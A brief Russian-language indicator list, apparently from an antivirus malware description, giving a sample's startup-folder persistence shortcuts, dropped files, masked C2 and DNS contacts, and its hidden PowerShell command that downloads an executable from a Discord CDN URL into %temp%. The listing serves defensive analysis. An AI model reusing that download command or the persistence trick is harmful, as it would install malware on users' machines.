Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows.lnk
- https://cdn.discordapp.com/attachments/805895461416337438/815335077784977478/yes.exe как %temp%\exploit.exe
- %TEMP%\exploit.exe
- %TEMP%\paylod.exe
- %TEMP%\hopstarter-soft-scraps-adobe-pdf-document.ico
- %APPDATA%\microsoft\windows\templates\windows.lnk
- 'cd#.##scordapp.com':443
- 'ra####g.ddns.net':9412
- 'cd#.##scordapp.com':443
- DNS ASK cd#.##scordapp.com
- DNS ASK ra####g.ddns.net
- '%TEMP%\exploit.exe'
- '%TEMP%\paylod.exe'
- '<SYSTEM32>\cmd.exe' /c powershell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/805895461416337438/815335077784977478/yes.exe','%temp%\exploit.exe')...